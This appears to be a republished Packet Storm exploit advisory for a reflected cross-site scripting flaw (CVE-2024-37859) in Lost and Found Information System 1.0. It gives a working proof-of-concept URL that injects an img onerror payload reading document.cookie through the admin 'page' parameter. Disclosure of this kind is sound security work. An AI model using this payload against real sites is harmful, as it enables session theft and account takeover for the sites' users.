Lost And Found Information System 1.0 Cross Site Scripting
2024-6-13 20:56:55 Author: packetstormsecurity.com(查看原文) 阅读量:3 收藏

# Exploit Title: Refelcted Cross Site Scripting Exploit - Lost and Found Information System 
# Exploit Author: Amit Roy (Rezur / AR0x7)
# Date: June 07, 2024
# Vendor Homepage: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-lfis.zip
# Tested on: Kali Linux, Apache, Mysql
# Version: v1.0
# Exploit Description:
# Lost and Found Information System v1.0 suffers from a Refelcted Cross Site Scripting Vulnerability allowing attackers to execute javascript in context of other users
# CVE : CVE-2024-37859

1) Visit the folowing url to trigger the XSS - http://target.com/admin/?page=<img src=x onerror=alert(document.cookie)>


文章来源: https://packetstormsecurity.com/files/179081/lfis10-xss.txt
如有侵权请联系:admin#unsafe.sh